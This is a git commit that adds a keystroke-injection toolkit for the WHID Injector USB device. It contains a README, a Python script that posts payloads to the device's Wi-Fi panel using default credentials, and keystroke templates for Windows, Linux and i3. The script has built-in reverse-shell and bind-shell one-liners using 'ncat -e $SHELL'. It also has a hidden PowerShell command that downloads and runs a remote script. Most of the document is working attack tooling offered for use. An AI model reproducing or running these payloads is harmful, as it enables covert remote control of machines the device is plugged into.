Beta release - Simple shells and commands exec

master
Swissky 2017-11-16 22:07:00 +01:00
parent e707f86e12
commit e2bff87c34
7 changed files with 223 additions and 2 deletions

Binary file not shown.

View File

@ -1,2 +1,69 @@
# WHID_Toolkit
Simple script for the WHID injector - a rubberducky wifi
# WHID Injector
**Disclaimer: Little project to interact with the WHID, mostly because I didn't wanted to modify the firmware to support my keyboard, feel free to improve it ;)**
What is it ? It's a simple script to send commands (french keyboard) from your terminal to the WHID Injector. It will automatically convert the "azerty" to "qwerty" format. Furthermore it has builtins payload such as reverse-shell and bind-shell.
Where to buy a WHID Injector ? I got mine from [Aliexpress](https://www.aliexpress.com/item/Cactus-Micro-compatible-board-plus-WIFI-chip-esp8266-for-atmega32u4/32318391529.html)
## How to start
Connect to the Access Point with the SSID "**Exploit**" with a password of "**DotAgency**".
Open a web browser pointed to "**http://192.168.1.1**"
The default administration username is "**admin**" and password "**hacktheplanet**".
Remember to upgrade the firmware you will find the version 2.7 in this repository
More info on the official Github : https://github.com/whid-injector/WHID
## How to use the script
```python
python3 WHIDInjector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt -a -h 127 ↵
usage: WHIDInjector.py [-h] [-v] [--host [HOST]] [--port [PORT]]
[--user [USER]] [--pass [PASS]] [--panel [PANEL]]
[--payload [PAYLOAD]]
optional arguments:
-h, --help show this help message and exit
-v Verbosity of the output
--host [HOST] Host reverse-shell
--port [PORT] Port reverse-shell
--user [USER] Wifi Panel username
--pass [PASS] Wifi Panel password
--panel [PANEL] Wifi Panel password
--payload [PAYLOAD] Payload template
```
Targeting a Windows OS
```
python3 WHIDInjector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt
```
Send a simple reverse-shell payload
```python
$ python3 WHIDInjector.py -v --host 127.0.0.1 --port 4444 1 ↵
-------------------------------------------------------------
WHID injector - You need to be connected to the Exploit AP
-------------------------------------------------------------
__ °
<(o )___
( ._> /
`---' @pentest_swissky
Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'
-------------------------------------------------------------------
>>> reverse
Payload:
Rem:Default Payload
Press:130+195
CustomDelay:1000
Print:bqsh 6c 4nohup ncqt !@&<)<)<! $$$$ 6e ]SHELL 14
CustomDelay:1000
Press:176
Sending payload to http://192.168.1.1/runlivepayload
```
# What's next ?
TODO change_ssid_name
TODO change_ssid_pass
TODO update_firmware

BIN
WHIDInjector.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 171 KiB

137
WHIDInjector.py Normal file
View File

@ -0,0 +1,137 @@
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
import argparse
from urllib.parse import urlencode, quote_plus
def banner():
print("""
\033[93m -------------------------------------------------------------\033[0m
\033[1m WHID injector - You need to be connected to the Exploit AP\033[0m
\033[93m -------------------------------------------------------------
__ °
<(o )___
( ._> /
`---'\033[0m @pentest_swissky
""")
print("Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'")
print("-------------------------------------------------------------------")
def help():
print("--------------[ Commands ]--------------")
print("Comment => Rem: Comment")
print("Delay => CustomDelay:1000")
print("Send key => Press:X+Y, Press:131+114")
print("Send text => Print:XYZ")
print("Move mouse => MouseMoveUp:X, MouseMoveDown:X, MouseMoveLeft:X, MouseMoveRight:X")
print("Mouse click => MouseClickLEFT:X, MouseClickRIGHT:X, MouseClickMIDDLE:X")
print("Blink led => BlinkLED:X")
print("The work around for writing a script that requires a '<' is to replace all instances of '<' with '&lt;'.")
print("")
print("--------------[ KeyboardModifiers ]--------------")
print("Key Decimal| Key Decimal")
print("KEY_LEFT_CTRL 128 | KEY_LEFT_SHIFT 129")
print("KEY_LEFT_ALT 130 | KEY_LEFT_GUI 131")
print("KEY_RIGHT_CTRL 132 | KEY_RIGHT_SHIFT 133")
print("KEY_RIGHT_ALT 134 | KEY_RIGHT_GUI 135")
print("KEY_UP_ARROW 218 | KEY_DOWN_ARROW 217")
print("KEY_LEFT_ARROW 216 | KEY_RIGHT_ARROW 215")
print("KEY_BACKSPACE 178 | KEY_TAB 179")
print("KEY_RETURN 176 | KEY_ESC 177")
print("KEY_INSERT 209 | KEY_PAGE_UP 211")
print("KEY_DELETE 212 | KEY_HOME 210")
print("KEY_END 213 | KEY_CAPS_LOCK 193")
print("KEY_F1 194 | KEY_F2 195")
print("KEY_F3 196 | KEY_F4 197")
print("KEY_F5 198 | KEY_F6 199")
print("KEY_F7 200 | KEY_F8 201")
print("KEY_F9 202 | KEY_F10 203")
print("KEY_F11 204 | KEY_F12 205")
def convert_to_keymap(user_input, payload):
# TODO find > < and |
fr_mapping = './mazqwAZQW&é"\'(-è_çà)^$Mù,?;:!§1234567890'
en_mapping = '<>;qwazQWAZ1234567890-[]:\'mM,./?!@#$%^&*()'
user_converted = user_input.translate(str.maketrans(fr_mapping,en_mapping))
user_converted = payload % user_converted
return user_converted
def send_payload(user_converted, panel):
payloads = { "livepayload":user_converted, "livepayloadpresent":1}
encoded = urlencode( payloads, quote_via=quote_plus)
try:
print('Sending payload to %s' % panel)
if not "200" in str(requests.post(panel, data=encoded)):
print("\033[91mError 404, are you connected on the right AP?")
except Exception as e:
print("\033[91mError, couldn't reach the Wifi Portal !")
def check_panel(panel):
try:
if not "ESPloit" in requests.get(panel, timeout=1).text:
print("\033[91mError 404, are you connected on the right AP?")
except Exception as e:
print("\033[91mError, couldn't reach the Wifi Portal !\033[0m")
if __name__ == "__main__":
# Parsing argument from command line
parser = argparse.ArgumentParser()
parser.add_argument('-v', action='store_true', dest='verbose',help='Verbosity of the output')
parser.add_argument('--host', nargs='?', default='127.0.0.1', help='Host reverse-shell' )
parser.add_argument('--port', nargs='?', default='4242', help='Port reverse-shell' )
parser.add_argument('--user', nargs='?', default='admin', help='Wifi Panel username')
parser.add_argument('--pass', nargs='?', default='hacktheplanet', help='Wifi Panel password')
parser.add_argument('--panel',nargs='?', default='http://192.168.1.1', help='Wifi Panel password')
parser.add_argument('--payload', nargs='?', default='payloads/default.txt', help='Payload template')
results = parser.parse_args()
# Default payload
payload = ""
with open(results.payload,'r') as f:
payload = f.read()
banner()
check_panel(results.panel)
while(True):
user_input = input("\033[92m>>> \033[0m")
# Simple user interactions
if user_input == "q" or user_input=="exit":
exit()
elif user_input == "h" or user_input == "help":
help()
continue
# Reverse Shell Linux
elif user_input == "reverse":
user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port)
# Bind Shell Linux
elif user_input == "bind":
user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port)
# Empire or anything for Windows
elif "empire" in user_input :
# Recommended https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
args = user_input.split(" ")
user_input = "powershell -W Hidden -nop -noni -c \"IEX (New-Object Net.Webclient).downloadstring('%s')\"" % args[1]
# Send evil payload
if user_input != "":
# Convert from AZERTY to QWERTY
user_converted = convert_to_keymap(user_input, payload)
if results.verbose == True:
print('\033[92mPayload:\033[0m\n%s' % user_converted)
# Send the payload
send_payload(user_converted, results.panel+"/runlivepayload")

6
payloads/default.txt Normal file
View File

@ -0,0 +1,6 @@
Rem:Command Execution
Press:130+195
CustomDelay:1000
Print:%s
CustomDelay:1000
Press:176

6
payloads/i3.txt Normal file
View File

@ -0,0 +1,6 @@
Rem:Command Execution for i3
Press:131+176
CustomDelay:1000
Print:%s
CustomDelay:1000
Press:176

5
payloads/windows.txt Normal file
View File

@ -0,0 +1,5 @@
Rem:Command Execution for Windows
Press:131+114
CustomDelay:1000
Print:%s
CustomDelay:1000